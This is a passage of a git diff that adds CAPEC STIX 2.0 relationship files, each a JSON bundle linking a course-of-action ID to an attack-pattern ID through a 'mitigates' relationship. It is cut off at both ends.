"course-of-action--a94284e2-a896-420f-b357-6008b0cbd10f", + "target_ref": "attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--88cab279-e362-42a3-b9a9-be4353aa826f.json b/capec/relationship/relationship--88cab279-e362-42a3-b9a9-be4353aa826f.json new file mode 100644 index 0000000000..652291c405 --- /dev/null +++ b/capec/relationship/relationship--88cab279-e362-42a3-b9a9-be4353aa826f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9624a13d-35fa-4e17-938e-87f422695b32", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--88cab279-e362-42a3-b9a9-be4353aa826f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--88df8824-2a9a-484a-a923-ab701e094915.json b/capec/relationship/relationship--88df8824-2a9a-484a-a923-ab701e094915.json new file mode 100644 index 0000000000..48796b6381 --- /dev/null +++ b/capec/relationship/relationship--88df8824-2a9a-484a-a923-ab701e094915.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6da3dea9-f1e9-4755-98ed-58d018645a95", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--88df8824-2a9a-484a-a923-ab701e094915", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f8b7652-8d89-485d-9984-db6eb7de0b20", + "target_ref": "attack-pattern--e7ba9615-51da-4376-b3b1-3f98ec19223a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--896afb75-0f0d-4181-ae82-46c064633811.json b/capec/relationship/relationship--896afb75-0f0d-4181-ae82-46c064633811.json new file mode 100644 index 0000000000..fbc4244b0e --- /dev/null +++ b/capec/relationship/relationship--896afb75-0f0d-4181-ae82-46c064633811.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2633b609-1bde-4e66-a745-0313b0cf7ac5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--896afb75-0f0d-4181-ae82-46c064633811", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf", + "target_ref": "attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--89927e5a-277d-4f6a-b091-3d0bf0e6bfdd.json b/capec/relationship/relationship--89927e5a-277d-4f6a-b091-3d0bf0e6bfdd.json new file mode 100644 index 0000000000..e33f6f51c7 --- /dev/null +++ b/capec/relationship/relationship--89927e5a-277d-4f6a-b091-3d0bf0e6bfdd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--72e079ca-e638-4b4f-bdd8-a1e47767865f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--89927e5a-277d-4f6a-b091-3d0bf0e6bfdd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d28c887c-36e8-4759-89f6-d459c8cc8847", + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8a19cac6-1d9f-4cc4-8268-8b2724964e81.json b/capec/relationship/relationship--8a19cac6-1d9f-4cc4-8268-8b2724964e81.json new file mode 100644 index 0000000000..ec3fcad3f7 --- /dev/null +++ b/capec/relationship/relationship--8a19cac6-1d9f-4cc4-8268-8b2724964e81.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5fc9cf8e-5987-4e42-8e47-bec48e3b49aa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8a19cac6-1d9f-4cc4-8268-8b2724964e81", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--10d32cb0-4883-4af3-b968-f1961bae95e9", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8a25e165-d6c1-44a3-bfb4-6cb12ba12e27.json b/capec/relationship/relationship--8a25e165-d6c1-44a3-bfb4-6cb12ba12e27.json new file mode 100644 index 0000000000..430fc6b89f --- /dev/null +++ b/capec/relationship/relationship--8a25e165-d6c1-44a3-bfb4-6cb12ba12e27.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--887e6321-ae0c-4473-8f09-ca1b8c553bbf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8a25e165-d6c1-44a3-bfb4-6cb12ba12e27", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8882bec0-0998-407d-b36f-b7a596e4e3ac", + "target_ref": "attack-pattern--5abb3ee9-40b8-421d-8a13-adce13e62d3c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8a4b7fe3-ad82-4086-9b30-6e5efcadea92.json b/capec/relationship/relationship--8a4b7fe3-ad82-4086-9b30-6e5efcadea92.json new file mode 100644 index 0000000000..ff831ea7eb --- /dev/null +++ b/capec/relationship/relationship--8a4b7fe3-ad82-4086-9b30-6e5efcadea92.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f50294a1-e268-4ce6-869b-6e5d23ac1729", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8a4b7fe3-ad82-4086-9b30-6e5efcadea92", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b18c283-ce7f-40c6-a077-7202626fc529", + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8c1b98ef-65ad-4323-9bc2-25ad78c7c7b5.json b/capec/relationship/relationship--8c1b98ef-65ad-4323-9bc2-25ad78c7c7b5.json new file mode 100644 index 0000000000..ce67e036dd --- /dev/null +++ b/capec/relationship/relationship--8c1b98ef-65ad-4323-9bc2-25ad78c7c7b5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1fc88877-133e-4065-9da5-68374ad473da", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8c1b98ef-65ad-4323-9bc2-25ad78c7c7b5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8c21c97b-4442-4427-91f7-ed7820bde031.json b/capec/relationship/relationship--8c21c97b-4442-4427-91f7-ed7820bde031.json new file mode 100644 index 0000000000..578173f521 --- /dev/null +++ b/capec/relationship/relationship--8c21c97b-4442-4427-91f7-ed7820bde031.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--94c24630-0558-434b-b457-20dd9fc31040", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8c21c97b-4442-4427-91f7-ed7820bde031", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2491ddd6-61d6-4cbd-9641-8a5523b27f8d", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8c3415e0-7622-4e5d-b63e-c5543b698140.json b/capec/relationship/relationship--8c3415e0-7622-4e5d-b63e-c5543b698140.json new file mode 100644 index 0000000000..0ca7b82e2c --- /dev/null +++ b/capec/relationship/relationship--8c3415e0-7622-4e5d-b63e-c5543b698140.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--70e7e220-29a4-400b-9c1a-d1841f2088f4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8c3415e0-7622-4e5d-b63e-c5543b698140", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8cd24df9-fbbc-45e6-9090-777c7bae0516.json b/capec/relationship/relationship--8cd24df9-fbbc-45e6-9090-777c7bae0516.json new file mode 100644 index 0000000000..5dd3385023 --- /dev/null +++ b/capec/relationship/relationship--8cd24df9-fbbc-45e6-9090-777c7bae0516.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c934f565-2a4e-40b4-b69d-82d8c1af8b2b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8cd24df9-fbbc-45e6-9090-777c7bae0516", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8d474304-906e-403d-ae0f-ae6720b2d8bd.json b/capec/relationship/relationship--8d474304-906e-403d-ae0f-ae6720b2d8bd.json new file mode 100644 index 0000000000..530ee10e3d --- /dev/null +++ b/capec/relationship/relationship--8d474304-906e-403d-ae0f-ae6720b2d8bd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--57dc1bbe-414e-45f7-8639-0aff11babcbe", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8d474304-906e-403d-ae0f-ae6720b2d8bd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926", + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8d51a424-be03-4360-86e5-8b52593e1b9d.json b/capec/relationship/relationship--8d51a424-be03-4360-86e5-8b52593e1b9d.json new file mode 100644 index 0000000000..6de69343b4 --- /dev/null +++ b/capec/relationship/relationship--8d51a424-be03-4360-86e5-8b52593e1b9d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e4155b35-6e15-4d08-b650-956043cb46f6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8d51a424-be03-4360-86e5-8b52593e1b9d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9", + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8deebf71-a2a6-4b9f-b4da-0234b9d83b46.json b/capec/relationship/relationship--8deebf71-a2a6-4b9f-b4da-0234b9d83b46.json new file mode 100644 index 0000000000..66f00049ed --- /dev/null +++ b/capec/relationship/relationship--8deebf71-a2a6-4b9f-b4da-0234b9d83b46.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--956c0fb9-6149-4510-9bd5-c6c602d65845", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8deebf71-a2a6-4b9f-b4da-0234b9d83b46", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3959d69a-ac6a-43ae-a89e-0dc12e8be517", + "target_ref": "attack-pattern--c1083be5-f4b3-4ecd-9baf-c0e88e70226e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8e7b2d66-fa6a-4ae8-ad81-c11393d31472.json b/capec/relationship/relationship--8e7b2d66-fa6a-4ae8-ad81-c11393d31472.json new file mode 100644 index 0000000000..7397a12b54 --- /dev/null +++ b/capec/relationship/relationship--8e7b2d66-fa6a-4ae8-ad81-c11393d31472.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--538efeee-c32e-4a56-bf5d-a7446e2b5729", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8e7b2d66-fa6a-4ae8-ad81-c11393d31472", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9dab8931-2b67-4fa0-9a9e-80ae1a738c4b", + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8e9e84d8-f20f-480e-b7ee-8adcb95f5b2c.json b/capec/relationship/relationship--8e9e84d8-f20f-480e-b7ee-8adcb95f5b2c.json new file mode 100644 index 0000000000..23cd40b877 --- /dev/null +++ b/capec/relationship/relationship--8e9e84d8-f20f-480e-b7ee-8adcb95f5b2c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--35aab435-b44e-477b-bc4a-08fda877485b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8e9e84d8-f20f-480e-b7ee-8adcb95f5b2c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--910ff626-f0db-4d42-9310-318119856ee6", + "target_ref": "attack-pattern--3dd0588e-c5b3-43bb-a544-0e874d4ebc61", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8f12378e-8d19-4157-b06e-8658c0fed625.json b/capec/relationship/relationship--8f12378e-8d19-4157-b06e-8658c0fed625.json new file mode 100644 index 0000000000..83b8665c45 --- /dev/null +++ b/capec/relationship/relationship--8f12378e-8d19-4157-b06e-8658c0fed625.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--81e2d6ac-0e19-49c2-9d65-e1c8c51e6b7a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8f12378e-8d19-4157-b06e-8658c0fed625", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf365993-fc2b-4a00-8e71-e79e98610b47", + "target_ref": "attack-pattern--63878e8b-cc30-4be4-bdeb-6141c8a17187", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8f235db5-fa5f-4639-8f92-66ee13f93eca.json b/capec/relationship/relationship--8f235db5-fa5f-4639-8f92-66ee13f93eca.json new file mode 100644 index 0000000000..1938e08952 --- /dev/null +++ b/capec/relationship/relationship--8f235db5-fa5f-4639-8f92-66ee13f93eca.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9bbf3ed3-bf2f-48b9-b7e8-18b3f343411c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8f235db5-fa5f-4639-8f92-66ee13f93eca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", + "target_ref": "attack-pattern--9e561f3e-1dc5-4db0-9fea-92bcb3b3f1c9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8f47f09d-2b56-4f15-b305-6b27f49fbc94.json b/capec/relationship/relationship--8f47f09d-2b56-4f15-b305-6b27f49fbc94.json new file mode 100644 index 0000000000..02ed5a1117 --- /dev/null +++ b/capec/relationship/relationship--8f47f09d-2b56-4f15-b305-6b27f49fbc94.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--66f0507f-815f-4a39-91a8-8ee61333ab82", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8f47f09d-2b56-4f15-b305-6b27f49fbc94", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7f7e04ce-16c7-4477-b567-098e8708dd0b", + "target_ref": "attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8fcd0914-f3d0-4b0f-9b42-9159f24c842d.json b/capec/relationship/relationship--8fcd0914-f3d0-4b0f-9b42-9159f24c842d.json new file mode 100644 index 0000000000..606539981e --- /dev/null +++ b/capec/relationship/relationship--8fcd0914-f3d0-4b0f-9b42-9159f24c842d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c6d12a24-9c66-47ef-9954-212b6d07d807", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8fcd0914-f3d0-4b0f-9b42-9159f24c842d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--33145ebc-8ed7-4a1f-a283-c5ba0073367b", + "target_ref": "attack-pattern--9f791235-8dca-43f4-aeda-1c58a81f76ae", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8ffe3d92-6215-4893-93ed-a0b59d44c7ef.json b/capec/relationship/relationship--8ffe3d92-6215-4893-93ed-a0b59d44c7ef.json new file mode 100644 index 0000000000..c783cd9467 --- /dev/null +++ b/capec/relationship/relationship--8ffe3d92-6215-4893-93ed-a0b59d44c7ef.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--282defaa-7a7d-46f3-bfb7-8310aacb26dc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8ffe3d92-6215-4893-93ed-a0b59d44c7ef", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0294f3dd-2a98-44e1-a229-b6928f573805", + "target_ref": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--90451497-c256-4016-b419-27ccb799bf61.json b/capec/relationship/relationship--90451497-c256-4016-b419-27ccb799bf61.json new file mode 100644 index 0000000000..e834616d2a --- /dev/null +++ b/capec/relationship/relationship--90451497-c256-4016-b419-27ccb799bf61.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dd36de1a-86c6-4a05-8956-fdd97e17aa15", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--90451497-c256-4016-b419-27ccb799bf61", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", + "target_ref": "attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--904606f7-adeb-4c0f-aabb-02122345431a.json b/capec/relationship/relationship--904606f7-adeb-4c0f-aabb-02122345431a.json new file mode 100644 index 0000000000..51b6d01c96 --- /dev/null +++ b/capec/relationship/relationship--904606f7-adeb-4c0f-aabb-02122345431a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--21555516-58f0-4985-8695-9b84395d74a2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--904606f7-adeb-4c0f-aabb-02122345431a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--eddd54f0-cdcf-45ce-b8fc-08421caaf53c", + "target_ref": "attack-pattern--475753a8-2215-49ac-99aa-dccd8dafc3df", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--90a04154-3ee7-48e9-a06c-f491ab3828e6.json b/capec/relationship/relationship--90a04154-3ee7-48e9-a06c-f491ab3828e6.json new file mode 100644 index 0000000000..a30e4523db --- /dev/null +++ b/capec/relationship/relationship--90a04154-3ee7-48e9-a06c-f491ab3828e6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8e9b76af-8958-49c6-987d-9e2ba93bad5b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--90a04154-3ee7-48e9-a06c-f491ab3828e6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3a98e579-34f3-4645-b229-ead3e426f738", + "target_ref": "attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--90aa64d8-d944-465e-a4f2-e675c4db1e3d.json b/capec/relationship/relationship--90aa64d8-d944-465e-a4f2-e675c4db1e3d.json new file mode 100644 index 0000000000..45e4fd7e07 --- /dev/null +++ b/capec/relationship/relationship--90aa64d8-d944-465e-a4f2-e675c4db1e3d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--68e01908-31ed-4d42-bc34-483b5886dc0a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--90aa64d8-d944-465e-a4f2-e675c4db1e3d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97", + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--90d7b81d-d132-4a5f-b3d4-40f3cec2c222.json b/capec/relationship/relationship--90d7b81d-d132-4a5f-b3d4-40f3cec2c222.json new file mode 100644 index 0000000000..2ce0f7ed6d --- /dev/null +++ b/capec/relationship/relationship--90d7b81d-d132-4a5f-b3d4-40f3cec2c222.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--869a99a9-ba9b-4614-8854-bf2b5f126eab", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--90d7b81d-d132-4a5f-b3d4-40f3cec2c222", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b281151-7e37-44b5-963a-2b376e8e2f26", + "target_ref": "attack-pattern--83a895c1-df98-4aa4-be2d-ace0108e64be", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--91018696-0020-40cb-8d37-c1b79a559ea3.json b/capec/relationship/relationship--91018696-0020-40cb-8d37-c1b79a559ea3.json new file mode 100644 index 0000000000..b84c36ae22 --- /dev/null +++ b/capec/relationship/relationship--91018696-0020-40cb-8d37-c1b79a559ea3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--007dbd98-f293-412e-bfb8-a45d9c31173f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--91018696-0020-40cb-8d37-c1b79a559ea3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--59ede157-2056-4a52-af14-09cf093ca618", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--917ea1c5-68c8-4efa-b1aa-57e3b3347b22.json b/capec/relationship/relationship--917ea1c5-68c8-4efa-b1aa-57e3b3347b22.json new file mode 100644 index 0000000000..abc976077c --- /dev/null +++ b/capec/relationship/relationship--917ea1c5-68c8-4efa-b1aa-57e3b3347b22.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--11f4d8b0-9eb3-4068-a29e-3aa374ef4acf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--917ea1c5-68c8-4efa-b1aa-57e3b3347b22", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + 